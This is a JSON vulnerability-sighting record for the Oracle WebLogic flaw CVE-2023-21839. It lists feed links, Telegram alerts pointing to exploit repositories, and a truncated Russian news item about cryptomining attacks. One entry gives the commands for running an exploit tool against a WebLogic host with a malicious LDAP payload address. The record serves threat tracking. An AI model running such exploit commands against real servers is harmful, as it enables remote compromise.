{"vulnerability": "CVE-2023-2183", "sightings": [{"uuid": "9a3fd3bf-0261-49e6-a2e3-6918e66dbe0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "bf327197-9f6b-4a45-8007-0c388e49997b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971807", "content": "", "creation_timestamp": "2024-12-24T20:34:18.253979Z"}, {"uuid": "a0c3e392-8fff-48a3-a771-1f17c2d5baa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://bsky.app/profile/gothburz.bsky.social/post/3leztqnzcuc2n", "content": "", "creation_timestamp": "2025-01-06T00:08:24.094017Z"}, {"uuid": "b0b19f95-9fb6-4143-9150-b591838054b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "8fc6a537-dd5d-4e1e-8b23-ab5aa3a46de1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:50.000000Z"}, {"uuid": "1613693e-9678-4f4b-940f-cd0a285a79a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:41.000000Z"}, {"uuid": "c5f70c97-0166-4847-bc5c-fcd87d78993e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb", "content": "", "creation_timestamp": "2023-06-09T19:18:50.000000Z"}, {"uuid": "b10147b2-6e3d-4a18-9280-421572534103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:00.000000Z"}, {"uuid": "3140e43f-cd34-4542-b83c-3cfe08c767ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3m2zlw2o6722q", "content": "", "creation_timestamp": "2025-10-12T21:02:32.516291Z"}, {"uuid": "c2010d0d-66fd-437f-8ed2-0743ee2a1f57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/javascript/cves/2023/CVE-2023-21839.yaml", "content": "", "creation_timestamp": "2025-10-10T10:54:11.000000Z"}, {"uuid": "e51defab-0901-423f-ba48-d8edc3961efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2023-21839", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3m46a4woycl2u", "content": "", "creation_timestamp": "2025-10-27T10:40:07.438545Z"}, {"uuid": "dd21e8f8-1170-4a5e-b0e6-b7fd36688a9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/628ebdf4-b837-4278-a32e-ed554a315e56", "content": "", "creation_timestamp": "2026-02-02T12:27:00.307455Z"}, {"uuid": "17434e60-2c46-422c-8694-105cba6abf72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3716", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21839 exp\nURL\uff1ahttps://github.com/fakenews2025/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-01-29T15:43:57.000000Z"}, {"uuid": "7451fa57-2375-491a-80ce-f33e7e99283f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3923", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21839\u5de5\u5177\nURL\uff1ahttps://github.com/Firebasky/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-03-11T08:31:12.000000Z"}, {"uuid": "a3a87f74-1a7d-46fd-a33b-fc1b82d5a6ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3830", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/4ra1n/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-02-25T16:58:59.000000Z"}, {"uuid": "265690f7-afff-4e3e-9f6b-66b8e29d030d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4229", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21839 Python\u7248\u672c\nURL\uff1ahttps://github.com/houqe/POC_CVE-2023-21839\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-21T08:09:35.000000Z"}, {"uuid": "f7211aef-7059-4c37-b185-778686a170a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6054", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aA testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432\nURL\uff1ahttps://github.com/Romanc9/Gui-poc-test\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-12-03T13:47:08.000000Z"}, {"uuid": "c9b5bd5c-acdb-4d1e-b6bf-6573eeaa1927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/17019", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/juniorinter/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-05T11:25:46.000000Z"}, {"uuid": "fb6015e1-073d-4e29-9528-131ce09749aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6572", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-20931, this is the bypass of the patch of CVE-2023-21839\nURL\uff1ahttps://github.com/dinosn/CVE-2024-20931\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-06T15:13:31.000000Z"}, {"uuid": "86211bb1-ca01-4272-95a2-4034e8eb2972", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/16635", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/thishistorian/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-03T14:11:21.000000Z"}, {"uuid": "602f0f55-cabb-4be4-b3b0-45e7622611a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/15217", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/outgoingcon/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-02-24T10:29:24.000000Z"}, {"uuid": "7d185609-5846-4556-9259-2e00f645d3ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2754", "content": "Weblogic CVE-2023-21839 RCE\n\nLinux/Mac OS\n cmd\ngo build -o CVE-2023-21839\n./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil\n\nWindows\n cmd\ngo build -o CVE-2023-21839.exe\nCVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil", "creation_timestamp": "2023-03-03T11:00:15.000000Z"}, {"uuid": "16c0e3b0-4494-4204-b6e5-dfe01d7d4b12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/22033", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aWeblogic CVE-2023-21839 RCE (\u65e0\u9700Java\u4f9d\u8d56\u4e00\u952eRCE)\nURL\uff1ahttps://github.com/illegalbrea/CVE-2023-21839\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-21T12:07:20.000000Z"}, {"uuid": "e199e4c0-0de9-4807-bcf8-dda2364dd162", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21833", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9103", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-21833\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Object Store).   The supported version that is affected is 8.8. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit.  Successful attacks of this vulnerability can result in  unauthorized read access to a subset of Oracle ZFS Storage Appliance Kit accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).\n\ud83d\udccf Published: 2024-02-17T01:48:16.779Z\n\ud83d\udccf Modified: 2025-03-27T14:18:16.137Z\n\ud83d\udd17 References:\n1. https://www.oracle.com/security-alerts/cpujan2024.html", "creation_timestamp": "2025-03-27T14:27:42.000000Z"}, {"uuid": "bd09c8b0-6f6a-4df7-b4b8-a7e411b2aa5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21839", "type": "exploited", "source": "https://t.me/itsec_news/4519", "content": "\u200b\u26a1\ufe0f\u041c\u0430\u0439\u043d\u0435\u0440\u044b-\u043d\u0435\u0432\u0438\u0434\u0438\u043c\u043a\u0438: 8220 Gang \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 WireGuard \u0434\u043b\u044f \u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0430\u0442\u0430\u043a\n\n\ud83d\udcac\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0438 \u043d\u043e\u0432\u044b\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043c\u0430\u0439\u043d\u0438\u043d\u0433\u0443 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b (\u043a\u0440\u0438\u043f\u0442\u043e\u0434\u0436\u0435\u043a\u0438\u043d\u0433\u0443), \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u043e\u0439 8220 Gang, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Oracle WebLogic Server.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0438\u0437 Trend Micro \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0432 \u0441\u0432\u043e\u0451\u043c \u0441\u0432\u0435\u0436\u0435\u043c \u043e\u0442\u0447\u0451\u0442\u0435, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0431\u0435\u0441\u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a Reflective DLL Loading. \u042d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u043c\u0443 \u041f\u041e \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432 \u043f\u0430\u043c\u044f\u0442\u0438, \u0438\u0437\u0431\u0435\u0433\u0430\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u043d\u0430 \u0434\u0438\u0441\u043a\u0435.\n8220 Gang, \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Water Sigbin, \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Oracle WebLogic Server, \u0432\u043a\u043b\u044e\u0447\u0430\u044f CVE-2017-3506, CVE-2017-10271 \u0438 CVE-2023-21839. \u0423\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u0430.\n\n\u041f\u043e\u0441\u043b\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 PowerShell, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043f\u0435\u0440\u0432\u044b\u0439 \u044d\u0442\u0430\u043f \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 (\u00abwireguard2-3.exe\u00bb). \u042d\u0442\u043e\u0442 \u0444\u0430\u0439\u043b \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 WireGuard VPN, \u043d\u043e \u043d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0434\u0440\u0443\u0433\u043e\u0439 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b (\u00abcvtres.exe\u00bb) \u043f\u0440\u044f\u043c\u043e \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e DLL (\u00abZxpus.dll\u00bb).\n\n\u042d\u0442\u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0441\u043b\u0443\u0436\u0438\u0442 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 PureCrypter (\u00abTixrgtluffu.dll\u00bb), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0437\u0430\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0434\u043b\u044f \u0430\u043a\u0442\u0438\u0432\u0430\u0446\u0438\u0438 \u043c\u0430\u0439\u043d\u0435\u0440\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432 \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u0430 Microsoft Defender.\n\n\u041a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435\u043c, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u043c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f XMRig, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u0442 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043c\u0430\u0439\u043d\u0435\u0440 \u0441 \u0434\u043e\u043c\u0435\u043d\u0430, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438. \u0421\u0430\u043c \u043c\u0430\u0439\u043d\u0435\u0440 \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b Microsoft (\u00abAddinProcess.exe\u00bb).\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u0435\u0442\u043e\u0434 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u043e \u0441\u043a\u0440\u044b\u0432\u0430\u0442\u044c\u0441\u044f \u043e\u0442 \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u0449\u0438\u0442\u044b. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0431\u0435\u0441\u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u043a \u0437\u0430\u0442\u0440\u0443\u0434\u043d\u044f\u0435\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e.\n\n\u041f\u043e\u043c\u0438\u043c\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 Oracle WebLogic Server, \u0433\u0440\u0443\u043f\u043f\u0430 8220 Gang \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 \u0434\u0440\u0443\u0433\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u044f \u0441\u0432\u043e\u0438\u0445 \u0446\u0435\u043b\u0435\u0439. \u0418\u0445 \u043c\u0435\u0442\u043e\u0434\u044b \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0441\u0442\u0432\u0443\u044e\u0442\u0441\u044f, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0438 \u0433\u0440\u0443\u043f\u043f\u044b \u0432\u0441\u0451 \u0431\u043e\u043b\u0435\u0435 \u0438\u0437\u043e\u0449\u0440\u0435\u043d\u043d\u044b\u043c\u0438 \u0438 \u043e\u043f\u0430\u0441\u043d\u044b\u043c\u0438.\n\n\u041e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043c\u0438\u0448\u0435\u043d\u044c\u044e \u044d\u0442\u0438\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u0438 \u0441\u0442\u0430\u0440\u044b\u043c\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0438\u0445 \u043b\u0451\u0433\u043a\u043e\u0439 \u0434\u043e\u0431\u044b\u0447\u0435\u0439 \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432. \u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u0441\u0432\u043e\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b 